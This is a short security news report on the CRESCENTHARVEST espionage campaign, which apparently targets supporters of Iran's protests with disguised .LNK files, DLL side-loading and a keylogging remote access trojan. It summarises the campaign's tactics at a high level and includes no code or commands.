CYBERSECURITY researchers have disclosed details of a campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s protests to conduct information theft and long‑term espionage. The Acronis Threat Research Unit said they observed the activity after 9 January, with attacks designed to deliver a remote access trojan and information stealer to execute commands, log keystrokes, and exfiltrate data, though it is not yet known if any attacks were successful.
The campaign lures victims by distributing malicious .LNK files masquerading as protest‑related images or videos, bundled with authentic media and a Farsi‑language report, and uses a malicious RAR archive that contains two Windows shortcut files that masquerade as image or video files. Once launched, PowerShell code retrieves another ZIP, while a legitimate Google‑signed binary and two rogue DLLs enable the payload, including the CRESCENTHARVEST DLL and a signed loader that harvests system data and keystrokes.
The actors reportedly rely on spear‑phishing or protracted social engineering, and the CRESCENTHARVEST toolset communicates with a C2 server via Windows Win HTTP APIs. According to Acronis, the initial access vector remains unknown, but the operation appears to reflect established tradecraft used in targeted cyber espionage against journalists, activists, and diaspora communities.